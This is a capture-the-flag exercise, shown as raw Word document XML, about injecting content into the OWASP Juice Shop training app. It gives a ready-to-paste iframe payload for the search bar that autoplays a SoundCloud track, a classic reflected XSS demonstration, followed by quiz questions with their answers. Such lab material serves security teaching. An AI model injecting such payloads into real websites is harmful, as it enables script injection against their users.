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CTF Topic: Uploading Files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8957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Users can upload files to a website if there is no proper validation in place to prevent the user from executing code in the website. In this CTF you will be asked to execute a code in the victim website which eventually plays an audio in the victim website.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color w:val="674ea7"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools and requirement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Juice Shop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Uploading Payload knowledge </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009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Link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https://juice-shop.herokuapp.com/#/search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required to inject an audio file : OWASP Juice Shop Jingle into the OWASP Juice Shop website using javascript.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="7030a0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.2gbg329iftmy" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="7030a0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Process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1: Goto the owasp juice shop website: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https://juice-shop.herokuapp.com/#/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2: Tap on the search bar and paste this:  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="</w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&amp;color=%23ff5500&amp;auto_play=true&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;show_teaser=true</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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1 : What HTML tag is the code written in?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 iframe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2 : Where did you insert the javascript code?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 SearchBar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3 : What syntax was used to declare the source of the audio file?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 src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&lt;iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="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https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&amp;color=%23ff5500&amp;auto_play=true&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;show_teaser=true</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"&gt;&lt;/iframe&gt;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uice-shop.herokuapp.com/#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.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&amp;color=%23ff5500&amp;auto_play=true&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;show_teaser=true" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&amp;color=%23ff5500&amp;auto_play=true&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;show_teaser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ice-shop.herokuapp.com/#/search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gVp6BZQCluMBNcIgzFlwHjQa+A==">CgMxLjAyDmguMmdiZzMyOWlmdG15OAByITFXWExRSXBFRzZHdDZwR01Pc3VvanFianVYY0RBM2JNcw==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